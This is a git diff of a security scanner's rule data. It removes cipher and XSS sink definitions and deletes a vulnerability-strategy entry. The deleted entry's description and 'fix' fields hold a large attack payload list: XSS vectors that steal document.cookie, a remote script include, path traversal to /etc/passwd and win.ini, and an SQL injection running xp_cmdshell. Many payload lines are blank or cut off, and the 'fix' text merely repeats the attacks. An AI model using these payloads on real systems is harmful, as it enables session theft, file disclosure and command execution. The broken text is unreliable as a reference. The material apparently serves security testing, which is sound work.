"command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Crypto.Cipher._mode_eax.EaxMode.encrypt" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Crypto.Cipher._mode_ecb.EcbMode.encrypt" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Crypto.Cipher._mode_ofb.OfbMode.encrypt" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Crypto.Cipher._mode_openpgp.OpenPgpMode.encrypt" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Cryptodome.Cipher._mode_cbc.CbcMode.encrypt" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Cryptodome.Cipher._mode_cfb.CfbMode.encrypt" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Cryptodome.Cipher._mode_ctr.CtrMode.encrypt" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Cryptodome.Cipher._mode_eax.EaxMode.encrypt" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Cryptodome.Cipher._mode_ecb.EcbMode.encrypt" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Cryptodome.Cipher._mode_ofb.OfbMode.encrypt" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Cryptodome.Cipher._mode_openpgp.OpenPgpMode.encrypt" - } - ], - "enable": 1, - "type": 4, - "value": "crypto-bad-ciphers" - }, { "details": [ { @@ -1330,39 +1141,6 @@ "type": 4, "value": "redos" }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P2,content", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "django.http.response.HttpResponse.__init__" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P2,rv", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "flask.app.Flask.make_response" - } - ], - "enable": 1, - "type": 4, - "value": "reflected-xss" - }, { "details": [ { diff --git a/static/data/vul_strategy.json b/static/data/vul_strategy.json index 0d0d6e708..a1dd376af 100644 --- a/static/data/vul_strategy.json +++ b/static/data/vul_strategy.json @@ -1,51 +1,19 @@ [ - { - "level": 1, - "state": "disable", - "system_type": 0, - "user": 1, - "vul_desc": "[a](javascript:prompt(document.cookie)) \n[a](j a v a s c r i p t:prompt(document.cookie)) \n![a](javascript:prompt(document.cookie))\\ \n \n<javascript:alert('XSS')> \n![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\\ \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[a](javascript:alert('XSS')) \n![a'\"`onerror=prompt(document.cookie)](x)\\ \n[citelol]: (javascript:prompt(document.cookie)) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[test](javascript://%0d%0aprompt(1)) \n[test](javascript://%0d%0aprompt(1);com) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie) \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[clickme](vbscript:alert(document.domain)) \n_http://danlec_@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);// \n> \n[text](http://danlec.com \" [@danlec](/danlec) \") \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](Javascript:alert(1)) \n[a](Javas%26%2399;ript:alert(1)) \n[a](javascript:alert￾(1)) \n[a](javascript:confirm(1) \n[a](javascript://www.google.com%0Aprompt(1)) \n[a](javascript://%0d%0aconfirm(1);com) \n[a](javascript:window.onerror=confirm;throw%201) \n[a]([\u4e3a\u4e86\u641c\u7d22\u6210\u529f\uff0c\u8fd9\u91cc\u4e3a0x01\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u4e0d\u5305\u62ec\u4e2d\u62ec\u53f7]javascript:alert(document.domain)) \n<\\h1\\>confirm(2)", - "vul_desc_en": null, - "vul_desc_zh": "[a](javascript:prompt(document.cookie)) \n[a](j a v a s c r i p t:prompt(document.cookie)) \n![a](javascript:prompt(document.cookie))\\ \n \n<javascript:alert('XSS')> \n![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\\ \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[a](javascript:alert('XSS')) \n![a'\"`onerror=prompt(document.cookie)](x)\\ \n[citelol]: (javascript:prompt(document.cookie)) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[test](javascript://%0d%0aprompt(1)) \n[test](javascript://%0d%0aprompt(1);com) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie) \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[clickme](vbscript:alert(document.domain)) \n_http://danlec_@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);// \n> \n[text](http://danlec.com \" [@danlec](/danlec) \") \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](Javascript:alert(1)) \n[a](Javas%26%2399;ript:alert(1)) \n[a](javascript:alert￾(1)) \n[a](javascript:confirm(1) \n[a](javascript://www.google.com%0Aprompt(1)) \n[a](javascript://%0d%0aconfirm(1);com) \n[a](javascript:window.onerror=confirm;throw%201) \n[a]([\u4e3a\u4e86\u641c\u7d22\u6210\u529f\uff0c\u8fd9\u91cc\u4e3a0x01\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u4e0d\u5305\u62ec\u4e2d\u62ec\u53f7]javascript:alert(document.domain)) \n<\\h1\\>confirm(2)", - "vul_fix": "[a](javascript:prompt(document.cookie)) \n[a](j a v a s c r i p t:prompt(document.cookie)) \n![a](javascript:prompt(document.cookie))\\ \n \n<javascript:alert('XSS')> \n![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\\ \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[a](javascript:alert('XSS')) \n![a'\"`onerror=prompt(document.cookie)](x)\\ \n[citelol]: (javascript:prompt(document.cookie)) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[test](javascript://%0d%0aprompt(1)) \n[test](javascript://%0d%0aprompt(1);com) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie) \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[clickme](vbscript:alert(document.domain)) \n_http://danlec_@.1 style=background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAABACAMAAADlCI9NAAACcFBMVEX/AAD//////f3//v7/0tL/AQH/cHD/Cwv/+/v/CQn/EBD/FRX/+Pj/ISH/PDz/6Oj/CAj/FBT/DAz/Bgb/rq7/p6f/gID/mpr/oaH/NTX/5+f/mZn/wcH/ICD/ERH/Skr/3Nz/AgL/trb/QED/z8//6+v/BAT/i4v/9fX/ZWX/x8f/aGj/ysr/8/P/UlL/8vL/T0//dXX/hIT/eXn/bGz/iIj/XV3/jo7/W1v/wMD/Hh7/+vr/t7f/1dX/HBz/zc3/nJz/4eH/Zmb/Hx//RET/Njb/jIz/f3//Ojr/w8P/Ghr/8PD/Jyf/mJj/AwP/srL/Cgr/1NT/5ub/PT3/fHz/Dw//eHj/ra3/IiL/DQ3//Pz/9/f/Ly//+fn/UFD/MTH/vb3/7Oz/pKT/1tb/2tr/jY3/6en/QkL/5OT/ubn/JSX/MjL/Kyv/Fxf/Rkb/sbH/39//iYn/q6v/qqr/Y2P/Li7/wsL/uLj/4+P/yMj/S0v/GRn/cnL/hob/l5f/s7P/Tk7/WVn/ior/09P/hYX/bW3/GBj/XFz/aWn/Q0P/vLz/KCj/kZH/5eX/U1P/Wlr/cXH/7+//Kir/r6//LS3/vr7/lpb/lZX/WFj/ODj/a2v/TU3/urr/tbX/np7/BQX/SUn/Bwf/4uL/d3f/ExP/y8v/NDT/KSn/goL/8fH/qan/paX/2Nj/HR3/4OD/VFT/Z2f/SEj/bm7/v7//RUX/Fhb/ycn/V1f/m5v/IyP/xMT/rKz/oKD/7e3/dHT/h4f/Pj7/b2//fn7/oqL/7u7/2dn/TEz/Gxv/6ur/3d3/Nzf/k5P/EhL/Dg7/o6P/UVHe/LWIAAADf0lEQVR4Xu3UY7MraRRH8b26g2Pbtn1t27Zt37Ft27Zt6yvNpPqpPp3GneSeqZo3z3r5T1XXL6nOFnc6nU6n0+l046tPruw/+Vil/C8tvfscquuuOGTPT2ZnRySwWaFQqGG8Y6j6Zzgggd0XChWLf/U1OFoQaVJ7AayUwPYALHEM6UCWBDYJbhXfHjUBOHvVqz8YABxfnDCArrED7jSAs13Px4Zo1jmA7eGEAXvXjRVQuQE4USWqp5pNoCthALePFfAQ0OcchoCGBAEPgPGiE7AiacChDfBmjjg7DVztAKRtnJsXALj/Hpiy2B9wofqW9AQAg8Bd8VOpCR02YMVEE4xli/L8AOmtQMQHsP9IGUBZedq/AWJfIez+x4KZqgDtBlbzon6A8GnonOwBXNONavlmUS2Dx8XTjcCwe1wNvGQB2gxaKhbV7Ubx3QC5bRMUuAEvA9kFzzW3TQAeVoB5cFw8zQUGPH9M4LwFgML5IpL6BHCvH0DmAD3xgIUpUJcTmy7UQHaV/bteKZ6GgGr3eAq4QQEmWlNqJ1z0BeTvgGfz4gAFsDXfUmbeAeoAF0OfuLL8C91jHnCtBchYq7YzsMsXIFkmDDsBjwBfi2o6GM9IrOshIp5mA6vc42Sg1wJMEVUJlPgDpBzWb3EAVsMOm5m7Hg5KrAjcJJ5uRn3uLAvosgBrRPUgnAgApC2HjtpRwFTneZRpqLs6Ak+Lp5lAj9+LccoCzLYPZjBA3gIGRgHj4EuxewH6JdZhKBVPM4CL7rEIiKo7kMAvILIEXplvA/bCR2JXAYMSawtkiqfaDHjNtYVfhzJJBvBGJ3zmADhv6054W71ZrBNvHZDigr0DDCcFkHeB8wog70G/2LXA+xIrh03i02Zgavx0Blo+SA5Q+yEcrVSAYvjYBhwEPrEoDZ+KX20wIe7G1ZtwTJIDyMYU+FwBeuGLpaLqg91NcqnqgQU9Yre/ETpzkwXIIKAAmRnQruboUeiVS1cHmF8pcv70bqBVkgak1tgAaYbuw9bj9kFjVN28wsJvxK9VFQDGzjVF7d9+9z1ARJIHyMxRQNo2SDn2408HBsY5njZJPcFbTomJo59H5HIAUmIDpPQXVGS0igfg7detBqptv/0ulwfIbbQB8kchVtNmiQsQUO7Qru37jpQX7WmS/6YZPXP+LPprbVgC0ul0Op1Op9Pp/gYrAa7fWhG7QQAAAABJRU5ErkJggg==);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);// \n> \n[text](http://danlec.com \" [@danlec](/danlec) \") \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](Javascript:alert(1)) \n[a](Javas%26%2399;ript:alert(1)) \n[a](javascript:alert￾(1)) \n[a](javascript:confirm(1) \n[a](javascript://www.google.com%0Aprompt(1)) \n[a](javascript://%0d%0aconfirm(1);com) \n[a](javascript:window.onerror=confirm;throw%201) \n[a]([\u4e3a\u4e86\u641c\u7d22\u6210\u529f\uff0c\u8fd9\u91cc\u4e3a0x01\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u4e0d\u5305\u62ec\u4e2d\u62ec\u53f7]javascript:alert(document.domain)) \n<\\h1\\>confirm(2)\n'> \n='> \n \n \n%3Cscript%3Ealert('XSS')%3C/script%3E \n \n \n%0a%0a.jsp \n%22%3cscript%3ealert(%22xss%22)%3c/script%3e \n%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd \n%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini \n%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e \n%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e \n%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html \n%3f.jsp \n%3f.jsp \n \n \n?sql_debug=1 \na%5c.aspx \na.jsp/ \na/ \na? \n\"> \n';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\\inetpub\\wwwroot\\?.txt'--&& \n%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \n%3Cscript%3Ealert(document. domain);%3C/script%3E& \n%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= \n1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= \nhttp://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd \n..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini \n\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini \n'';!--\"=&{()} \n \n \n \n \n \n \n \n \n \n \n\"\";' > out \n \n \n \n \n \n \n \n
\n \n \n \n \n \n \n \n \n \n
\n
\n
\n \n \n \n \n \n \ngetURL(\"javascript:alert('XSS')\") \na=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert('XSS');\";eval(a+b+c+d); \n \n\"> <\" \n \n \n \n \n \n \n \nPT src=\"http://xss.ha.ckers.org/a.js\"> \nlink\n\n\";alert(1);//xx \n \n \n\u00bcscript\u00bealert(\u00a2XSS\u00a2)\u00bc/script\u00be //US-ASCII\u7f16\u7801\uff0c\u5982Tomcat \n \n \n \n \n \n \n \n \naaaa \naaaa \nXSS \nXSS \n \n \n //\u65e0\u9700js\u6807\u7b7e\uff0c\u53ef\u76f4\u63a5\u6267\u884c \n //IE7\u4ee5\u4e0b \n \n \n
//IE7\u4ee5\u4e0b \n
\n \n \n //Firefox/Chrome \n \n \n \n //Firefox/Chrome/Safari \n \n \n \n'\"> //IE \n //IE \n \n \n \nal \n// \u4e0b\u9762\u7684img\u6807\u7b7e\u90fd\u662f\u5728IE7\u4ee5\u4e0b\u7248\u672c\u751f\u6548 \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n //IE7\u4ee5\u4e0b \n \n \n //IE7\u4ee5\u4e0b \n \n \n //Firefox \n \n \n \n \nalalertert(1) \n \n \n \n \n \n \n[quote]\">'> \n<[/quote] \n \n \n
  • XSS
    //IE7\u4ee5\u4e0b \n //IE7\u4ee5\u4e0b \n //IE7\u4ee5\u4e0b \n //IE7\u4ee5\u4e0b \n \n \n \n \n \n
//IE7\u4ee5\u4e0b \n
//IE7\u4ee5\u4e0b \n
//IE7\u4ee5\u4e0b", - "vul_fix_en": null, - "vul_fix_zh": "[a](javascript:prompt(document.cookie)) \n[a](j a v a s c r i p t:prompt(document.cookie)) \n![a](javascript:prompt(document.cookie))\\ \n \n<javascript:alert('XSS')> \n![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\\ \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[a](javascript:alert('XSS')) \n![a'\"`onerror=prompt(document.cookie)](x)\\ \n[citelol]: (javascript:prompt(document.cookie)) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[test](javascript://%0d%0aprompt(1)) \n[test](javascript://%0d%0aprompt(1);com) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie) \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[clickme](vbscript:alert(document.domain)) \n_http://danlec_@.1 style=background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAABACAMAAADlCI9NAAACcFBMVEX/AAD//////f3//v7/0tL/AQH/cHD/Cwv/+/v/CQn/EBD/FRX/+Pj/ISH/PDz/6Oj/CAj/FBT/DAz/Bgb/rq7/p6f/gID/mpr/oaH/NTX/5+f/mZn/wcH/ICD/ERH/Skr/3Nz/AgL/trb/QED/z8//6+v/BAT/i4v/9fX/ZWX/x8f/aGj/ysr/8/P/UlL/8vL/T0//dXX/hIT/eXn/bGz/iIj/XV3/jo7/W1v/wMD/Hh7/+vr/t7f/1dX/HBz/zc3/nJz/4eH/Zmb/Hx//RET/Njb/jIz/f3//Ojr/w8P/Ghr/8PD/Jyf/mJj/AwP/srL/Cgr/1NT/5ub/PT3/fHz/Dw//eHj/ra3/IiL/DQ3//Pz/9/f/Ly//+fn/UFD/MTH/vb3/7Oz/pKT/1tb/2tr/jY3/6en/QkL/5OT/ubn/JSX/MjL/Kyv/Fxf/Rkb/sbH/39//iYn/q6v/qqr/Y2P/Li7/wsL/uLj/4+P/yMj/S0v/GRn/cnL/hob/l5f/s7P/Tk7/WVn/ior/09P/hYX/bW3/GBj/XFz/aWn/Q0P/vLz/KCj/kZH/5eX/U1P/Wlr/cXH/7+//Kir/r6//LS3/vr7/lpb/lZX/WFj/ODj/a2v/TU3/urr/tbX/np7/BQX/SUn/Bwf/4uL/d3f/ExP/y8v/NDT/KSn/goL/8fH/qan/paX/2Nj/HR3/4OD/VFT/Z2f/SEj/bm7/v7//RUX/Fhb/ycn/V1f/m5v/IyP/xMT/rKz/oKD/7e3/dHT/h4f/Pj7/b2//fn7/oqL/7u7/2dn/TEz/Gxv/6ur/3d3/Nzf/k5P/EhL/Dg7/o6P/UVHe/LWIAAADf0lEQVR4Xu3UY7MraRRH8b26g2Pbtn1t27Zt37Ft27Zt6yvNpPqpPp3GneSeqZo3z3r5T1XXL6nOFnc6nU6n0+l046tPruw/+Vil/C8tvfscquuuOGTPT2ZnRySwWaFQqGG8Y6j6Zzgggd0XChWLf/U1OFoQaVJ7AayUwPYALHEM6UCWBDYJbhXfHjUBOHvVqz8YABxfnDCArrED7jSAs13Px4Zo1jmA7eGEAXvXjRVQuQE4USWqp5pNoCthALePFfAQ0OcchoCGBAEPgPGiE7AiacChDfBmjjg7DVztAKRtnJsXALj/Hpiy2B9wofqW9AQAg8Bd8VOpCR02YMVEE4xli/L8AOmtQMQHsP9IGUBZedq/AWJfIez+x4KZqgDtBlbzon6A8GnonOwBXNONavlmUS2Dx8XTjcCwe1wNvGQB2gxaKhbV7Ubx3QC5bRMUuAEvA9kFzzW3TQAeVoB5cFw8zQUGPH9M4LwFgML5IpL6BHCvH0DmAD3xgIUpUJcTmy7UQHaV/bteKZ6GgGr3eAq4QQEmWlNqJ1z0BeTvgGfz4gAFsDXfUmbeAeoAF0OfuLL8C91jHnCtBchYq7YzsMsXIFkmDDsBjwBfi2o6GM9IrOshIp5mA6vc42Sg1wJMEVUJlPgDpBzWb3EAVsMOm5m7Hg5KrAjcJJ5uRn3uLAvosgBrRPUgnAgApC2HjtpRwFTneZRpqLs6Ak+Lp5lAj9+LccoCzLYPZjBA3gIGRgHj4EuxewH6JdZhKBVPM4CL7rEIiKo7kMAvILIEXplvA/bCR2JXAYMSawtkiqfaDHjNtYVfhzJJBvBGJ3zmADhv6054W71ZrBNvHZDigr0DDCcFkHeB8wog70G/2LXA+xIrh03i02Zgavx0Blo+SA5Q+yEcrVSAYvjYBhwEPrEoDZ+KX20wIe7G1ZtwTJIDyMYU+FwBeuGLpaLqg91NcqnqgQU9Yre/ETpzkwXIIKAAmRnQruboUeiVS1cHmF8pcv70bqBVkgak1tgAaYbuw9bj9kFjVN28w